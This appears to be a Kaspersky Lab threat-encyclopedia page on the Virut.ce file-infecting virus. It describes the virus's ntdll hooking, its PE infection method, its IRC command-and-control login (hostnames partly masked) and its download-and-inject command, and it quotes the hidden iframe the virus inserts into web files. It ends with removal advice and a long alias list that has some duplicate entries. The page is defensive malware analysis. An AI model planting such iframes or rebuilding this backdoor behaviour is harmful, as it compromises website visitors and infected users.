English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

Virus.Win32.Virut.ce

Detected Oct 29 2009 14:07 GMT
Released Jan 09 2013 12:15 GMT
Published Oct 29 2009 14:07 GMT

Manual description Auto description
This description was created by experts at Kaspersky Lab. It contains the most accurate information available about this program.

Technical Details
Payload
Removal instructions

Technical Details

This file virus infects Windows executable files. It is a malicious code contained in Windows PE EXE files. The virus body is about 17 Kb, though the use of polymorphic encryption means its size may vary.

Propagation

The virus injects its code into the address spaces of all the processes running in the system. The injected code intercepts the following system functions in the ntdll.dll library:

NtCreateFile
NtCreateProcess
NtCreateProcessEx
NtOpenFile
NtQueryInformationProcess
Using these system functions, the virus tracks files that are opened and any applications launched for execution. When the virus detects a new process being launched or an executable file being opened, it infects it. Files with .EXE and .SCR extensions are infected. These files are Windows (PE EXE) applications. The virus does not infect files with names containing any of the following strings: “WINC”, “WCUN”, “WC32”, “PSTO”. When infecting a file, the virus expands the PE section and writes its own polymorphic body into it. It then modifies the program’s entry point so that it leads to the virus code.


Payload

The virus adds the executable file of the host process to the Windows firewall list of trusted applications.

Then it disables the “Restore system files” function.

The virus attempts to contact the following IRC servers:

prox*****ircgalaxy.pl
irc*****ef.pl
If a connection is established, the virus sends the following commands to the server:
NICK dewxxpyi
USER b
JOIN #.<rnd1>, where rnd1 is a random number.
Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.

The virus is capable of executing the following commands:

  • !Get: download a malicious code from the Internet and inject it into processes running on the victim computer.
  • !hosu: open specified URLs on the victim computer.

The virus also scans the victim computer’s hard drive for files with the following extensions:

HTM
PHP
ASP
If found, it adds the following string into them:
<iframe src="http://****.pl/rc/" width=1 height=1
style="border:0"></iframe>

Removal instructions

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program: Update your Kaspersky Anti-Virus databases and perform a full scan of the computer (download trial version).


Bookmark and Share
Share
Virus

Viruses replicate on the resources of the local machine.

Unlike worms, viruses do not use network services to propagate or penetrate other computers. A copy of a virus will reach remote computers only if the infected object is, for some reason unrelated to the virus function, activated on another computer. For example:

  • when infecting accessible disks, a virus penetrates a file located on a network resource
  • a virus copies itself to a removable storage device or infects a file on a removable device
  • a user sends an email with an infected attachment.

Aliases

Virus.Win32.Virut.ce (Kaspersky Lab) is also known as:

  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Trojan.Win32.Genome.aeywa (Kaspersky Lab)
  • Trojan.Win32.Vilsel.bevv (Kaspersky Lab)
  • Email-Worm.Win32.Brontok.se (Kaspersky Lab)
  • Email-Worm.Win32.Brontok.sd (Kaspersky Lab)
  • Trojan.Win32.Genome.sdlo (Kaspersky Lab)
  • Worm.Win32.AutoRun.bzax (Kaspersky Lab)
  • Worm.Win32.AutoRun.byqn (Kaspersky Lab)
  • Trojan.Win32.Autoit.aji (Kaspersky Lab)
  • IM-Worm.Win32.VB.akl (Kaspersky Lab)
  • Worm.Win32.Zombaque.l (Kaspersky Lab)
  • Worm.Win32.AutoRun.hmn (Kaspersky Lab)
  • Trojan.Win32.Refroso.cbmr (Kaspersky Lab)
  • Trojan-PSW.Win32.QQPass.xqo (Kaspersky Lab)
  • Worm.Win32.VB.bbo (Kaspersky Lab)
  • Trojan.Win32.Vilsel.cfb (Kaspersky Lab)
  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Hoax.Win32.Sality.ae (Kaspersky Lab)
  • P2P-Worm.Win32.Sality.ae (Kaspersky Lab)
  • Trojan-Downloader.Win32.Virut.ce (Kaspersky Lab)
  • Trojan-SMS.Win32.Virut.ce (Kaspersky Lab)
  • Trojan.Win32.Virut.ce (Kaspersky Lab)
  • Hoax.Win32.Virut.ce (Kaspersky Lab)
  • Backdoor.Win32.Virut.ce (Kaspersky Lab)
  • Worm.Win32.AutoRun.fya (Kaspersky Lab)
  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Backdoor.Win32.IRCBot.ihd (Kaspersky Lab)
  • Virus: W32/Virut.n.gen (McAfee)
  • W32.Changeup.8657 (Symantec)
  • W32.Virut.CF.37843 (Symantec)
  • W32/Scribble-B (Sophos)
  • W32/Sality.AO (Panda)
  • Virus:Win32/Virut.BN (MS(OneCare))
  • Win32.Virut.56 (DrWeb)
  • Win32.Virtob.Gen.12 (BitDef7)
  • Win32.Virut.AB.Gen (VirusBuster)
  • Win32:VB-YDQ [Trj] (AVAST)
  • File was not downloaded for scan (AVAST)
  • Gen.Trojan.Heur (Ikarus)
  • Trojan.Win32.Spy (Ikarus)
  • Win32/DH.FF81010B{40580000-00001000-00000000-00000000} (AVG)
  • Win32/Virut (AVG)
  • W32/Virut.gen (AVIRA)
  • W32/Virut.HL (Norman)
  • W32/Virut.EH (Norman)
  • Win32.Virut.dy (Rising)
  • Win32.Virtob.Gen.12 [Aquarius] (FSecure)
  • PE_VIRUX.R (TrendMicro)
  • Virus.Win32.Virut.ce (v) (Sunbelt)
  • Virus.Win32.Virut.ce.5 (v) (Sunbelt)
  • Win32.Virut.AB.Gen (VirusBusterBeta)
  • W32/Virut.CE (Fortinet)
  • Win32.Virtob.Gen.12 (GData)